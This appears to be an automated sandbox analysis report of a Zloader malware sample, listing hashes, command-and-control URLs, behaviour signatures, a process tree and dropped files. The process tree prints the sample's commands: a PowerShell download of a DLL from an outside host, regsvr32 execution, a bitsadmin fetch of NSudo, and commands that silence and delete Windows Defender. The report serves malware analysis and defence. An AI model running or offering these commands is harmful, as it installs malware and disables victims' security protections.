Analysis

  • max time kernel
    46s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-07-2021 14:28

General

  • Target

    start.EXE

  • Size

    165KB

  • MD5

    95abe912bb579d445f4b2cc30c6e3750

  • SHA1

    4f8ddf498f7dceb9a5d32de909ced0518f697ef0

  • SHA256

    cbc445b9882192d8cb8c62c6a5231e6efedcb5d60b610fcb1147a943c2a83e21

  • SHA512

    515e6c8b08fceb21153ec4df5a7a21d283da135d4aed0116420b6dec59ec1168cf6ef7a12fd593fb5f492de0f7e180d15405a57dd0484859c3c3d7a4db54115e

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\start.EXE
    "C:\Users\Admin\AppData\Local\Temp\start.EXE"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:60
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://srwhpvikxwoxfmgotrje.com/Java.dll -OutFile Java.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1640
      • C:\Windows\system32\regsvr32.exe
        regsvr32 Java.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3932
        • C:\Windows\SysWOW64\regsvr32.exe
          Java.dll
          4⤵
          • Loads dropped DLL
          PID:1656
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:2088
        • C:\Windows\system32\cacls.exe
          "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
          3⤵
            PID:2116
          • C:\Windows\system32\wscript.exe
            wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
            3⤵
              PID:3532
            • C:\Windows\system32\bitsadmin.exe
              bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
              3⤵
              • Download via BitsAdmin
              PID:2756
            • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
              NSudo -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
              3⤵
                PID:2328
              • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
                NSudo -U:T -ShowWindowMode:Hide sc delete windefend
                3⤵
                  PID:2236

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Registry Run Keys / Startup Folder

            1
            T1060

            BITS Jobs

            1
            T1197

            Defense Evasion

            Modify Registry

            1
            T1112

            BITS Jobs

            1
            T1197

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
              MD5

              3dbdaa0a6eba1c576c706edf9b82c171

              SHA1

              2ac4023bdf41e3319570307cc8888194e4277130

              SHA256

              f89a7ca58aefeee7953adbd8e32f18b95b71e51144d07920ba41b3447b42d233

              SHA512

              c2071c45ece1b5408bbbab3e5970adc46d8e21327f2489f2e7610d4532c5108dc24f1e8531d3ba9138641b194cfa33ed32e998360509fa34bfba234c0a607cc8

            • C:\Users\Admin\AppData\Local\Temp\tmp.vbs
              MD5

              fd95bf47d800456ff50e10f166be01d0

              SHA1

              a0acd9785d740974ba894ce311f70f6ca102709f

              SHA256

              4dc30753f79cd1088d0a5d729f9d5373bbba893be4490b90d149b25b6a8e2b55

              SHA512

              e288b26f6bc406e04f1b3d2af463af656804ea37abb54ef8a732105471e11d3e95c719bdcd7a89fff15afa5648efcbccc7d8ed1b577d523ba354a21357964e69

            • C:\Users\Admin\AppData\Roaming\Java.dll
              MD5

              ef6326ba3912f4d0fc7bcfcb36e41cfe

              SHA1

              4ea0bec0d162db3c2d38f60feab64e16c52d14e2

              SHA256

              2439bee322854d93826f1f915eab127ae637b19cc89ed32a2c1a047730733f47

              SHA512

              80b1ed813d032a2d1b7b3dc041f338428ca718b4175ba1e74af36937b8b76b31158b4153233fe20599f1d5cee6eab22e26c05c29428278ebb3fce92f3a495a77

            • \Users\Admin\AppData\Roaming\Java.dll
              MD5

              ef6326ba3912f4d0fc7bcfcb36e41cfe

              SHA1

              4ea0bec0d162db3c2d38f60feab64e16c52d14e2

              SHA256

              2439bee322854d93826f1f915eab127ae637b19cc89ed32a2c1a047730733f47

              SHA512

              80b1ed813d032a2d1b7b3dc041f338428ca718b4175ba1e74af36937b8b76b31158b4153233fe20599f1d5cee6eab22e26c05c29428278ebb3fce92f3a495a77

            • memory/60-114-0x0000000000000000-mapping.dmp
            • memory/1640-116-0x0000000000000000-mapping.dmp
            • memory/1640-121-0x0000016D41500000-0x0000016D41501000-memory.dmp
              Filesize

              4KB

            • memory/1640-124-0x0000016D416D0000-0x0000016D416D1000-memory.dmp
              Filesize

              4KB

            • memory/1640-129-0x0000016D41540000-0x0000016D41542000-memory.dmp
              Filesize

              8KB

            • memory/1640-130-0x0000016D41543000-0x0000016D41545000-memory.dmp
              Filesize

              8KB

            • memory/1640-131-0x0000016D41546000-0x0000016D41548000-memory.dmp
              Filesize

              8KB

            • memory/1656-138-0x0000000000000000-mapping.dmp
            • memory/1656-140-0x0000000000A80000-0x0000000000BCA000-memory.dmp
              Filesize

              1.3MB

            • memory/1656-141-0x0000000010000000-0x0000000010142000-memory.dmp
              Filesize

              1.3MB

            • memory/2088-142-0x0000000000000000-mapping.dmp
            • memory/2088-148-0x0000000000FC0000-0x0000000000FE6000-memory.dmp
              Filesize

              152KB

            • memory/2116-145-0x0000000000000000-mapping.dmp
            • memory/2236-151-0x0000000000000000-mapping.dmp
            • memory/2328-150-0x0000000000000000-mapping.dmp
            • memory/2756-149-0x0000000000000000-mapping.dmp
            • memory/3532-146-0x0000000000000000-mapping.dmp
            • memory/3932-136-0x0000000000000000-mapping.dmp